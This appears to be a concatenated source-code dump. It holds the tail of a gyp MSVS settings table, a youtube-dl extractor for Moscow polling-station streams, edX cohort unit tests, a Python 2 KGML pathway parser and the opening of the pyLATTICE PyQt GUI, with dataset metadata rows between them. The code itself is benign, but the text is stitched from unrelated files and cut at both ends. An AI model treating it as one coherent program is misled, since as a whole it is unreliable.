_MSVSOnly(_manifest, 'DependencyInformationFile', _file_name)
_MSVSOnly(_manifest, 'UseFAT32Workaround', _boolean)
_MSVSOnly(_manifest, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_manifest, 'EnableDPIAwareness', _boolean)
_MSBuildOnly(_manifest, 'GenerateCategoryTags', _boolean) # /category
_MSBuildOnly(_manifest, 'ManifestFromManagedAssembly',
_file_name) # /managedassemblyname
_MSBuildOnly(_manifest, 'OutputResourceManifests', _string) # /outputresource
_MSBuildOnly(_manifest, 'SuppressDependencyElement', _boolean) # /nodependency
_MSBuildOnly(_manifest, 'TrackerLogDirectory', _folder_name)
# Directives for MASM.
# See "$(VCTargetsPath)\BuildCustomizations\masm.xml" for the schema of the
# MSBuild MASM settings.
# Options that have the same name in MSVS and MSBuild.
_Same(_masm, 'UseSafeExceptionHandlers', _boolean) # /safeseh
| mit | -7,070,577,698,995,857,000 | 40.099453 | 80 | 0.64924 | false |
vinegret/youtube-dl | youtube_dl/extractor/vyborymos.py | 73 | 2031 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import compat_str
class VyboryMosIE(InfoExtractor):
_VALID_URL = r'https?://vybory\.mos\.ru/(?:#precinct/|account/channels\?.*?\bstation_id=)(?P<id>\d+)'
_TESTS = [{
'url': 'http://vybory.mos.ru/#precinct/13636',
'info_dict': {
'id': '13636',
'ext': 'mp4',
'title': 're:^Участковая избирательная комиссия №2231 [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
'description': 'Россия, Москва, улица Введенского, 32А',
'is_live': True,
},
'params': {
'skip_download': True,
}
}, {
'url': 'http://vybory.mos.ru/account/channels?station_id=13636',
'only_matching': True,
}]
def _real_extract(self, url):
station_id = self._match_id(url)
channels = self._download_json(
'http://vybory.mos.ru/account/channels?station_id=%s' % station_id,
station_id, 'Downloading channels JSON')
formats = []
for cam_num, (sid, hosts, name, _) in enumerate(channels, 1):
for num, host in enumerate(hosts, 1):
formats.append({
'url': 'http://%s/master.m3u8?sid=%s' % (host, sid),
'ext': 'mp4',
'format_id': 'camera%d-host%d' % (cam_num, num),
'format_note': '%s, %s' % (name, host),
})
info = self._download_json(
'http://vybory.mos.ru/json/voting_stations/%s/%s.json'
% (compat_str(station_id)[:3], station_id),
station_id, 'Downloading station JSON', fatal=False)
return {
'id': station_id,
'title': self._live_title(info['name'] if info else station_id),
'description': info.get('address'),
'is_live': True,
'formats': formats,
}
| unlicense | 2,872,991,913,881,644,500 | 34.8 | 113 | 0.506348 | false |
jelugbo/ddi | common/djangoapps/course_groups/tests/test_cohorts.py | 12 | 19917 | import django.test
from django.contrib.auth.models import User
from django.conf import settings
from django.http import Http404
from django.test.utils import override_settings
from mock import call, patch
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
from course_groups.models import CourseUserGroup
from course_groups import cohorts
from course_groups.tests.helpers import topic_name_to_id, config_course_cohorts, CohortFactory
from xmodule.modulestore.django import modulestore, clear_existing_modulestores
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.modulestore.tests.django_utils import mixed_store_config
# NOTE: running this with the lms.envs.test config works without
# manually overriding the modulestore. However, running with
# cms.envs.test doesn't.
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
TEST_MAPPING = {'edX/toy/2012_Fall': 'xml'}
TEST_DATA_MIXED_MODULESTORE = mixed_store_config(TEST_DATA_DIR, TEST_MAPPING)
@patch("course_groups.cohorts.tracker")
class TestCohortSignals(django.test.TestCase):
def setUp(self):
self.course_key = SlashSeparatedCourseKey("dummy", "dummy", "dummy")
def test_cohort_added(self, mock_tracker):
# Add cohort
cohort = CourseUserGroup.objects.create(
name="TestCohort",
course_id=self.course_key,
group_type=CourseUserGroup.COHORT
)
mock_tracker.emit.assert_called_with(
"edx.cohort.created",
{"cohort_id": cohort.id, "cohort_name": cohort.name}
)
mock_tracker.reset_mock()
# Modify existing cohort
cohort.name = "NewName"
cohort.save()
self.assertFalse(mock_tracker.called)
# Add non-cohort group
CourseUserGroup.objects.create(
name="TestOtherGroupType",
course_id=self.course_key,
group_type="dummy"
)
self.assertFalse(mock_tracker.called)
def test_cohort_membership_changed(self, mock_tracker):
cohort_list = [CohortFactory() for _ in range(2)]
non_cohort = CourseUserGroup.objects.create(
name="dummy",
course_id=self.course_key,
group_type="dummy"
)
user_list = [UserFactory() for _ in range(2)]
mock_tracker.reset_mock()
def assert_events(event_name_suffix, user_list, cohort_list):
mock_tracker.emit.assert_has_calls([
call(
"edx.cohort.user_" + event_name_suffix,
{
"user_id": user.id,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
}
)
for user in user_list for cohort in cohort_list
])
# Add users to cohort
cohort_list[0].users.add(*user_list)
assert_events("added", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Remove users from cohort
cohort_list[0].users.remove(*user_list)
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from cohort
cohort_list[0].users.add(*user_list)
cohort_list[0].users.clear()
assert_events("removed", user_list, cohort_list[:1])
mock_tracker.reset_mock()
# Clear users from non-cohort group
non_cohort.users.add(*user_list)
non_cohort.users.clear()
self.assertFalse(mock_tracker.emit.called)
# Add cohorts to user
user_list[0].course_groups.add(*cohort_list)
assert_events("added", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Remove cohorts from user
user_list[0].course_groups.remove(*cohort_list)
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear cohorts from user
user_list[0].course_groups.add(*cohort_list)
user_list[0].course_groups.clear()
assert_events("removed", user_list[:1], cohort_list)
mock_tracker.reset_mock()
# Clear non-cohort groups from user
user_list[0].course_groups.add(non_cohort)
user_list[0].course_groups.clear()
self.assertFalse(mock_tracker.emit.called)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestCohorts(django.test.TestCase):
def setUp(self):
"""
Make sure that course is reloaded every time--clear out the modulestore.
"""
clear_existing_modulestores()
self.toy_course_key = SlashSeparatedCourseKey("edX", "toy", "2012_Fall")
def test_is_course_cohorted(self):
"""
Make sure cohorts.is_course_cohorted() correctly reports if a course is cohorted or not.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
self.assertFalse(cohorts.is_course_cohorted(course.id))
config_course_cohorts(course, [], cohorted=True)
self.assertTrue(course.is_cohorted)
self.assertTrue(cohorts.is_course_cohorted(course.id))
# Make sure we get a Http404 if there's no course
fake_key = SlashSeparatedCourseKey('a', 'b', 'c')
self.assertRaises(Http404, lambda: cohorts.is_course_cohorted(fake_key))
def test_get_cohort_id(self):
"""
Make sure that cohorts.get_cohort_id() correctly returns the cohort id, or raises a ValueError when given an
invalid course key.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
user = UserFactory(username="test", email="a@b.com")
self.assertIsNone(cohorts.get_cohort_id(user, course.id))
config_course_cohorts(course, discussions=[], cohorted=True)
cohort = CohortFactory(course_id=course.id, name="TestCohort")
cohort.users.add(user)
self.assertEqual(cohorts.get_cohort_id(user, course.id), cohort.id)
self.assertRaises(
ValueError,
lambda: cohorts.get_cohort_id(user, SlashSeparatedCourseKey("course", "does_not", "exist"))
)
def test_get_cohort(self):
"""
Make sure cohorts.get_cohort() does the right thing when the course is cohorted
"""
course = modulestore().get_course(self.toy_course_key)
self.assertEqual(course.id, self.toy_course_key)
self.assertFalse(course.is_cohorted)
user = UserFactory(username="test", email="a@b.com")
other_user = UserFactory(username="test2", email="a2@b.com")
self.assertIsNone(cohorts.get_cohort(user, course.id), "No cohort created yet")
cohort = CohortFactory(course_id=course.id, name="TestCohort")
cohort.users.add(user)
self.assertIsNone(
cohorts.get_cohort(user, course.id),
"Course isn't cohorted, so shouldn't have a cohort"
)
# Make the course cohorted...
config_course_cohorts(course, discussions=[], cohorted=True)
self.assertEquals(
cohorts.get_cohort(user, course.id).id,
cohort.id,
"user should be assigned to the correct cohort"
)
self.assertEquals(
cohorts.get_cohort(other_user, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"other_user should be assigned to the default cohort"
)
def test_auto_cohorting(self):
"""
Make sure cohorts.get_cohort() does the right thing with auto_cohort_groups
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
user1 = UserFactory(username="test", email="a@b.com")
user2 = UserFactory(username="test2", email="a2@b.com")
user3 = UserFactory(username="test3", email="a3@b.com")
user4 = UserFactory(username="test4", email="a4@b.com")
cohort = CohortFactory(course_id=course.id, name="TestCohort")
# user1 manually added to a cohort
cohort.users.add(user1)
# Add an auto_cohort_group to the course...
config_course_cohorts(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=["AutoGroup"]
)
self.assertEquals(cohorts.get_cohort(user1, course.id).id, cohort.id, "user1 should stay put")
self.assertEquals(cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should be auto-cohorted")
# Now make the auto_cohort_group list empty
config_course_cohorts(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=[]
)
self.assertEquals(
cohorts.get_cohort(user3, course.id).id,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).id,
"No groups->default cohort"
)
# Now set the auto_cohort_group to something different
config_course_cohorts(
course,
discussions=[],
cohorted=True,
auto_cohort_groups=["OtherGroup"]
)
self.assertEquals(
cohorts.get_cohort(user4, course.id).name, "OtherGroup", "New list->new group"
)
self.assertEquals(
cohorts.get_cohort(user1, course.id).name, "TestCohort", "user1 should still be in originally placed cohort"
)
self.assertEquals(
cohorts.get_cohort(user2, course.id).name, "AutoGroup", "user2 should still be in originally placed cohort"
)
self.assertEquals(
cohorts.get_cohort(user3, course.id).name,
cohorts.get_cohort_by_name(course.id, cohorts.DEFAULT_COHORT_NAME).name,
"user3 should still be in the default cohort"
)
def test_auto_cohorting_randomization(self):
"""
Make sure cohorts.get_cohort() randomizes properly.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
groups = ["group_{0}".format(n) for n in range(5)]
config_course_cohorts(
course, discussions=[], cohorted=True, auto_cohort_groups=groups
)
# Assign 100 users to cohorts
for i in range(100):
user = UserFactory(
username="test_{0}".format(i),
email="a@b{0}.com".format(i)
)
cohorts.get_cohort(user, course.id)
# Now make sure that the assignment was at least vaguely random:
# each cohort should have at least 1, and fewer than 50 students.
# (with 5 groups, probability of 0 users in any group is about
# .8**100= 2.0e-10)
for cohort_name in groups:
cohort = cohorts.get_cohort_by_name(course.id, cohort_name)
num_users = cohort.users.count()
self.assertGreater(num_users, 1)
self.assertLess(num_users, 50)
def test_get_course_cohorts_noop(self):
"""
Tests get_course_cohorts returns an empty list when no cohorts exist.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(course, [], cohorted=True)
self.assertEqual([], cohorts.get_course_cohorts(course))
def test_get_course_cohorts(self):
"""
Tests that get_course_cohorts returns all cohorts, including auto cohorts.
"""
course = modulestore().get_course(self.toy_course_key)
config_course_cohorts(
course, [], cohorted=True,
auto_cohort_groups=["AutoGroup1", "AutoGroup2"]
)
# add manual cohorts to course 1
CohortFactory(course_id=course.id, name="ManualCohort")
CohortFactory(course_id=course.id, name="ManualCohort2")
cohort_set = {c.name for c in cohorts.get_course_cohorts(course)}
self.assertEqual(cohort_set, {"AutoGroup1", "AutoGroup2", "ManualCohort", "ManualCohort2"})
def test_is_commentable_cohorted(self):
course = modulestore().get_course(self.toy_course_key)
self.assertFalse(course.is_cohorted)
def to_id(name):
return topic_name_to_id(course, name)
# no topics
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course doesn't even have a 'General' topic"
)
# not cohorted
config_course_cohorts(course, ["General", "Feedback"], cohorted=False)
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course isn't cohorted"
)
# cohorted, but top level topics aren't
config_course_cohorts(course, ["General", "Feedback"], cohorted=True)
self.assertTrue(course.is_cohorted)
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course is cohorted, but 'General' isn't."
)
self.assertTrue(
cohorts.is_commentable_cohorted(course.id, to_id("random")),
"Non-top-level discussion is always cohorted in cohorted courses."
)
# cohorted, including "Feedback" top-level topics aren't
config_course_cohorts(
course, ["General", "Feedback"],
cohorted=True,
cohorted_discussions=["Feedback"]
)
self.assertTrue(course.is_cohorted)
self.assertFalse(
cohorts.is_commentable_cohorted(course.id, to_id("General")),
"Course is cohorted, but 'General' isn't."
)
self.assertTrue(
cohorts.is_commentable_cohorted(course.id, to_id("Feedback")),
"Feedback was listed as cohorted. Should be."
)
def test_get_cohorted_commentables(self):
"""
Make sure cohorts.get_cohorted_commentables() correctly returns a list of strings representing cohorted
commentables. Also verify that we can't get the cohorted commentables from a course which does not exist.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
config_course_cohorts(course, [], cohorted=True)
self.assertEqual(cohorts.get_cohorted_commentables(course.id), set())
config_course_cohorts(
course, ["General", "Feedback"],
cohorted=True,
cohorted_discussions=["Feedback"]
)
self.assertItemsEqual(
cohorts.get_cohorted_commentables(course.id),
set([topic_name_to_id(course, "Feedback")])
)
config_course_cohorts(
course, ["General", "Feedback"],
cohorted=True,
cohorted_discussions=["General", "Feedback"]
)
self.assertItemsEqual(
cohorts.get_cohorted_commentables(course.id),
set([topic_name_to_id(course, "General"), topic_name_to_id(course, "Feedback")])
)
self.assertRaises(
Http404,
lambda: cohorts.get_cohorted_commentables(SlashSeparatedCourseKey("course", "does_not", "exist"))
)
def test_get_cohort_by_name(self):
"""
Make sure cohorts.get_cohort_by_name() properly finds a cohort by name for a given course. Also verify that it
raises an error when the cohort is not found.
"""
course = modulestore().get_course(self.toy_course_key)
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_name(course.id, "CohortDoesNotExist")
)
cohort = CohortFactory(course_id=course.id, name="MyCohort")
self.assertEqual(cohorts.get_cohort_by_name(course.id, "MyCohort"), cohort)
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_name(SlashSeparatedCourseKey("course", "does_not", "exist"), cohort)
)
def test_get_cohort_by_id(self):
"""
Make sure cohorts.get_cohort_by_id() properly finds a cohort by id for a given
course.
"""
course = modulestore().get_course(self.toy_course_key)
cohort = CohortFactory(course_id=course.id, name="MyCohort")
self.assertEqual(cohorts.get_cohort_by_id(course.id, cohort.id), cohort)
cohort.delete()
self.assertRaises(
CourseUserGroup.DoesNotExist,
lambda: cohorts.get_cohort_by_id(course.id, cohort.id)
)
@patch("course_groups.cohorts.tracker")
def test_add_cohort(self, mock_tracker):
"""
Make sure cohorts.add_cohort() properly adds a cohort to a course and handles
errors.
"""
course = modulestore().get_course(self.toy_course_key)
added_cohort = cohorts.add_cohort(course.id, "My Cohort")
mock_tracker.emit.assert_any_call(
"edx.cohort.creation_requested",
{"cohort_name": added_cohort.name, "cohort_id": added_cohort.id}
)
self.assertEqual(added_cohort.name, "My Cohort")
self.assertRaises(
ValueError,
lambda: cohorts.add_cohort(course.id, "My Cohort")
)
self.assertRaises(
ValueError,
lambda: cohorts.add_cohort(SlashSeparatedCourseKey("course", "does_not", "exist"), "My Cohort")
)
@patch("course_groups.cohorts.tracker")
def test_add_user_to_cohort(self, mock_tracker):
"""
Make sure cohorts.add_user_to_cohort() properly adds a user to a cohort and
handles errors.
"""
course_user = UserFactory(username="Username", email="a@b.com")
UserFactory(username="RandomUsername", email="b@b.com")
course = modulestore().get_course(self.toy_course_key)
CourseEnrollment.enroll(course_user, self.toy_course_key)
first_cohort = CohortFactory(course_id=course.id, name="FirstCohort")
second_cohort = CohortFactory(course_id=course.id, name="SecondCohort")
# Success cases
# We shouldn't get back a previous cohort, since the user wasn't in one
self.assertEqual(
cohorts.add_user_to_cohort(first_cohort, "Username"),
(course_user, None)
)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": first_cohort.id,
"cohort_name": first_cohort.name,
"previous_cohort_id": None,
"previous_cohort_name": None,
}
)
# Should get (user, previous_cohort_name) when moved from one cohort to
# another
self.assertEqual(
cohorts.add_user_to_cohort(second_cohort, "Username"),
(course_user, "FirstCohort")
)
mock_tracker.emit.assert_any_call(
"edx.cohort.user_add_requested",
{
"user_id": course_user.id,
"cohort_id": second_cohort.id,
"cohort_name": second_cohort.name,
"previous_cohort_id": first_cohort.id,
"previous_cohort_name": first_cohort.name,
}
)
# Error cases
# Should get ValueError if user already in cohort
self.assertRaises(
ValueError,
lambda: cohorts.add_user_to_cohort(second_cohort, "Username")
)
# UserDoesNotExist if user truly does not exist
self.assertRaises(
User.DoesNotExist,
lambda: cohorts.add_user_to_cohort(first_cohort, "non_existent_username")
)
| agpl-3.0 | -5,519,821,087,430,878,000 | 36.36773 | 120 | 0.608375 | false |
widdowquinn/KGML | KGML_parser.py | 1 | 7550 | # (c) The James Hutton Institute 2013
# Author: Leighton Pritchard
#
# Contact:
# leighton.pritchard@hutton.ac.uk
#
# Leighton Pritchard,
# Information and Computing Sciences,
# James Hutton Institute,
# Errol Road,
# Invergowrie,
# Dundee,
# DD6 9LH,
# Scotland,
# UK
#
# The MIT License
#
# Copyright (c) 2010-2014 The James Hutton Institute
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
""" This module provides classes and functions to parse a KGML pathway map
The KGML pathway map is parsed into the object structure defined in
KGML_Pathway.py in this module.
Classes
KGMLParser Parses KGML file
Functions
read Returns a single Pathway object, using KGMLParser
internally
"""
from KGML_pathway import *
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
import xml.etree.cElementTree as ElementTree
except ImportError:
import xml.etree.ElementTree as ElementTree
def read(handle, debug=0):
""" Returns a single Pathway object. There should be one and only
one pathway in each file, but there may well be pathological
examples out there.
"""
iterator = parse(handle, debug)
try:
first = iterator.next()
except StopIteration:
first = None
if first is None:
raise ValueError("No pathways found in handle")
try:
second = iterator.next()
except StopIteration:
second = None
if second is not None:
raise ValueError("More than one pathway found in handle")
return first
def parse(handle, debug=0):
""" Returns an iterator over Pathway elements
handle file handle to a KGML file for parsing
debug integer for amount of debug information
to print
This is a generator for the return of multiple Pathway objects.
"""
# Check handle
if not hasattr(handle, 'read'):
if isinstance(handle, str):
handle = StringIO(handle)
else:
exc_txt = "An XML-containing handle or an XML string " +\
"must be provided"
raise Exception(exc_txt)
# Parse XML and return each Pathway
for event, elem in \
ElementTree.iterparse(handle, events=('start', 'end')):
if event == "end" and elem.tag == "pathway":
yield KGMLParser(elem).parse()
elem.clear()
class KGMLParser(object):
""" Parse a KGML XML Pathway entry into a Pathway object
"""
def __init__(self, elem):
self.entry = elem
def parse(self):
""" Parse the input elements
"""
def _parse_pathway(attrib):
for k, v in attrib.items():
self.pathway.__setattr__(k, v)
def _parse_entry(element):
new_entry = Entry()
for k, v in element.attrib.items():
new_entry.__setattr__(k, v)
for subelement in element.getchildren():
if subelement.tag == 'graphics':
_parse_graphics(subelement, new_entry)
elif subelement.tag == 'component':
_parse_component(subelement, new_entry)
self.pathway.add_entry(new_entry)
def _parse_graphics(element, entry):
new_graphics = Graphics(entry)
for k, v in element.attrib.items():
new_graphics.__setattr__(k, v)
entry.add_graphics(new_graphics)
def _parse_component(element, entry):
new_component = Component(entry)
for k, v in element.attrib.items():
new_component.__setattr__(k, v)
entry.add_component(new_component)
def _parse_reaction(element):
new_reaction = Reaction()
for k, v in element.attrib.items():
new_reaction.__setattr__(k, v)
for subelement in element.getchildren():
if subelement.tag == 'substrate':
new_reaction.add_substrate(int(subelement.attrib['id']))
elif subelement.tag == 'product':
new_reaction.add_product(int(subelement.attrib['id']))
self.pathway.add_reaction(new_reaction)
def _parse_relation(element):
new_relation = Relation()
new_relation.entry1 = int(element.attrib['entry1'])
new_relation.entry2 = int(element.attrib['entry2'])
new_relation.type = element.attrib['type']
for subtype in element.getchildren():
name, value = subtype.attrib['name'], subtype.attrib['value']
if name in ('compound', 'hidden compound'):
new_relation.subtypes.append((name, int(value)))
else:
new_relation.subtypes.append((name, value))
self.pathway.add_relation(new_relation)
#==========#
# Initialise Pathway
self.pathway = Pathway()
# Get information about the pathway itself
_parse_pathway(self.entry.attrib)
for element in self.entry.getchildren():
if element.tag == 'entry':
_parse_entry(element)
elif element.tag == 'reaction':
_parse_reaction(element)
elif element.tag == 'relation':
_parse_relation(element)
# Parsing of some elements not implemented - no examples yet
else:
# This should warn us of any unimplemented tags
print "Warning: tag %s not implemented in parser" % element.tag
return self.pathway
if __name__ == '__main__':
# Check large metabolism
pathway = read(open('ko01100.xml', 'rU'))
print pathway
for k, v in pathway.entries.items()[:20]:
print v
for r in pathway.reactions[:20]:
print r
print len(pathway.maps)
# Check relations
pathway = read(open('ko_metabolic/ko00010.xml', 'rU'))
print pathway
for k, v in pathway.entries.items()[:20]:
print v
for r in pathway.reactions[:20]:
print r
for r in pathway.relations[:20]:
print r
print len(pathway.maps)
# Check components
pathway = read(open('ko_metabolic/ko00253.xml', 'rU'))
print pathway
for k, v in pathway.entries.items():
print v
print len(pathway.maps)
# Test XML representation
print pathway.get_KGML()
# Test bounds of pathway
print pathway.bounds
| mit | 7,659,131,650,805,647,000 | 33.318182 | 79 | 0.61298 | false |
eegroopm/pyLATTICE | gui/pyLATTICE.py | 1 | 74321 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
pyLATTICE is...
"""
from __future__ import division #necessary for python2
from __future__ import unicode_literals
# define authorship information
__authors__ = ['Evan Groopman', 'Thomas Bernatowicz']
__author__ = ','.join(__authors__)
__credits__ = []
__copyright__ = 'Copyright (c) 2011-2014'
__license__ = 'GPL'
# maintanence information
__maintainer__ = 'Evan Groopman'
__email__ = 'eegroopm@gmail.com'
"""
Created on Wed Apr 11 14:46:56 2012
@author: Evan Groopman
"""
#Main imports
from PyQt4 import QtCore, QtGui, uic
import os, sys
import numpy as np
import pandas as pd
import re
#Matplotlib imports
import matplotlib as mpl
mpl.use('Qt4Agg')
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
# Local files in the resource directory
import gui
from resources.TableWidget import TableWidget
from resources.Diffraction import Diffraction
#from resources.pyqtresizer import logit,slResizer,Resizer
from resources.IPythonConsole import IPythonConsole
from resources.common import common
from resources.matplotlibwidget import matplotlibWidget
from resources.Dialogs import (MineralListDialog, NewMineralDialog,
ManualConditionsDialog, SettingsDialog)
try:
from resources.dspace import DSpace
print('Importing compiled "DSpace"')
except ImportError as error:
# Attempt autocompilation.
import pyximport
pyximport.install()
from resources._dspace import DSpace
print('Building "DSpace"')
try:
from resources.diffspot import CalcSpots, CalcSpotsHCP
print('Importing compiled "DiffSpot"')
except ImportError as error:
# Attempt autocompilation.
import pyximport
pyximport.install()
from resources._diffspot import CalcSpots, CalcSpotsHCP
print('Building "DiffSpot"')
#need different compiled versions of Cython modules depending on python version
#if sys.version_info[0] == 3:
# #from resources.dspace import DSpace#Cython function for calculating d-spaces
# #from resources.diffspot import CalcSpots, CalcSpotsHCP#Cython function for calculating diffraction spot coordinates
# from resources.pyqtresizer import logit,slResizer,Resizer
#elif sys.version_info[0] == 2:
# #from resources.dspace_py2 import DSpace#Cython function for calculating d-spaces
# #from resources.diffspot_py2 import CalcSpots, CalcSpotsHCP#Cython function for calculating diffraction spot coordinates
# from resources.pyqtresizer_py2 import logit,slResizer,Resizer
#from Wulff_net import WULFF
#dealing with unicode characters in windows, which breaks compiled linux rendering
if sys.platform == 'win32':
mpl.rc('font', **{'sans-serif' : 'Arial Unicode MS','family' : 'sans-serif'})
#elif sys.platform == 'linux':# and os.path.isfile('pyLATTICE'): #on linux AND executable file exists. Does nothing if running from source
# print('Adjusting font')
# mpl.rc('font',**{'sans-serif' : 'Bitstream Vera Sans','family' : 'sans-serif'})
#use LaTeX to render symbols
#plt.rc('text', usetex=True)
mpl.rcParams['mathtext.default'] = 'regular'
#mpl.rcParams['text.latex.preamble'] = [r'\usepackage{textcomp}']
#mpl.rcParams['text.latex.unicode'] = True
#Other
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
################################################################################
## Gui file ##
# Set up window
class pyLATTICE_GUI(QtGui.QMainWindow):
def __init__(self, parent=None):
super(pyLATTICE_GUI, self).__init__(parent)
# load the ui
gui.loadUi(__file__,self)
self.version = gui.__version__
self._grabCommon()
self.Diffraction = Diffraction()
self.DiffWidget = matplotlibWidget(self.common,self.Diffraction) #mplwidget can access common data
#self.DiffWidget.setStyleSheet("font-family: 'Arial Unicode MS', Arial, sans-serif; font-size: 15px;")
self.verticalLayout.addWidget(self.DiffWidget)
self.DiffWidget.distances.connect(self.on_distances_sent)
#self.DiffWidget = self.MplWidget
self.Plot = self.DiffWidget.canvas.ax
self.Plot.axis('equal') #locks aspect ratio 1:1, even when zooming
#matplotlibWidget.setupToolbar(self.DiffWidget.canvas, self.DiffTab)
# Create the navigation toolbar, tied to the canvas
self.mpl_toolbar = NavigationToolbar(self.DiffWidget.canvas, self.DiffTab)
#add widgets to toolbar
self.comboBox_rotate = QtGui.QComboBox()
self.checkBox_labels = QtGui.QCheckBox("Labels")
self.checkBox_labels.setChecked(True)
self.mpl_toolbar.addWidget(self.comboBox_rotate)
self.mpl_toolbar.addWidget(self.checkBox_labels)
#add toolbar to tabs
self.verticalLayout.addWidget(self.mpl_toolbar)
#Plot initial zero spot
self.Plot.plot(0,0, linestyle = '', marker='o', markersize = 10, color = 'black')
self.Plot.set_xlim([-5,5])
self.Plot.set_ylim([-5,5])
#self.Plot.annotate('0 0 0', xy = (0,0), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',
#bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
#Initialize Metric tensor Tables
self.Gtable_size = (200,200)
self.Gtable = TableWidget()
self.G_inv_table = TableWidget()
self.tensorlayout.addWidget(self.Gtable,2,0) #third row, first column
self.tensorlayout.addWidget(self.G_inv_table,2,1)
self.Gtable.resize(self.Gtable_size[0],self.Gtable_size[1])
self.G_inv_table.resize(self.Gtable_size[0],self.Gtable_size[1])
self.Gtable.setData(np.eye(3))
self.G_inv_table.setData(np.eye(3))
for i in range(3):
self.Gtable.setColumnWidth(i,self.Gtable_size[0]/4)
self.Gtable.setRowHeight(i,self.Gtable_size[1]/3.5)
self.G_inv_table.setColumnWidth(i,self.Gtable_size[0]/3.35)
self.G_inv_table.setRowHeight(i,self.Gtable_size[1]/3.5)
self.a = 1; self.b=1; self.c=1
#Initialize parameter tables
self.param_table_size = (200,200)
self.Gparam_table = TableWidget()
self.Gparam_inv_table = TableWidget()
self.Gparam_table.resize(self.param_table_size[0],self.param_table_size[1])
self.Gparam_inv_table.resize(self.param_table_size[0],self.param_table_size[1])
initdat = np.transpose(np.array([[1,1,1,90,90,90]]))
self.Gparam_table.setData(initdat)
self.Gparam_inv_table.setData(initdat)
self.Gparam_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_inv_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_table.setVerticalHeaderLabels([u'a',u'b',u'c',u'\u03B1',u'\u03B2',u'\u03B3'])
self.Gparam_inv_table.setVerticalHeaderLabels([u'a*',u'b*',u'c*',u'\u03B1*',u'\u03B2*',u'\u03B3*'])
self.tensorlayout.addWidget(self.Gparam_table,3,0)
self.tensorlayout.addWidget(self.Gparam_inv_table,3,1)
for i in range(0,6):
self.Gparam_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_table.setRowHeight(i,self.param_table_size[0]/6.7)
self.Gparam_inv_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_inv_table.setRowHeight(i,self.param_table_size[0]/6.7)
#D-spacing table
self.dspace_table_size = (400,630)
self.dspace_table = TableWidget()
self.dspace_table.resize(self.dspace_table_size[0],self.dspace_table_size[1])
self.dspace_table.setData(np.array([[0,0,0,0]]))
self.dspace_table.setHorizontalHeaderLabels(['d-space','h','k','l'])
self.dspacelayout.addWidget(self.dspace_table)
self.dspace_table.setColumnWidth(0,80)
for i in range(1,4):
self.dspace_table.setColumnWidth(i,50)
# Set miller indices
self.miller_indices = [str(x) for x in range(-6,7)]
self.comboBox_hmin.addItems(self.miller_indices)
self.comboBox_kmin.addItems(self.miller_indices)
self.comboBox_lmin.addItems(self.miller_indices)
self.comboBox_hmin.setCurrentIndex(4)
self.comboBox_kmin.setCurrentIndex(4)
self.comboBox_lmin.setCurrentIndex(4)
# Miller max indices set to be 1 greater than selected min index
self.comboBox_hmax.addItems(self.miller_indices)
